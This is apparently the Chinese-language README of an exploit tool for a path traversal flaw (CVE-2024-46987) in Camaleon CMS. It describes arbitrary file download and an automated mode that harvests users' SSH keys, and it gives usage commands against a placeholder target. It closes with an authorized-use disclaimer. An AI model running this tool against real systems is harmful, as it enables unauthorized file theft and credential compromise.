该工具利用了 Camaleon CMS 中的一个路径遍历漏洞(CVE-2024-46987)。它允许任意文件下载,并包含一个自动化功能,试图从系统中发现的用户中获取 SSH 密钥。
pip install -r requirements.txt
默认情况下,脚本以交互模式运行,您可以输入要下载的文件路径。
python3 cve-2024-46987.py -u http://target.com -l admin -p password
使用 --bruteforce-ssh 标志自动挖掘 SSH 密钥。
python3 cve-2024-46987.py -u http://target.com -l admin -p password --bruteforce-ssh
-u, --url: 目标基础 URL(必需)-l, --login: 登录用户名(默认:admin)-p, --password: 登录密码(默认:password)-c, --cookie: 手动会话 Cookie(可选)--bruteforce-ssh: 启用自动化 SSH 密钥收集模式该工具仅用于教育目的和授权的渗透测试。未经事先相互同意,使用此工具攻击目标是非法的。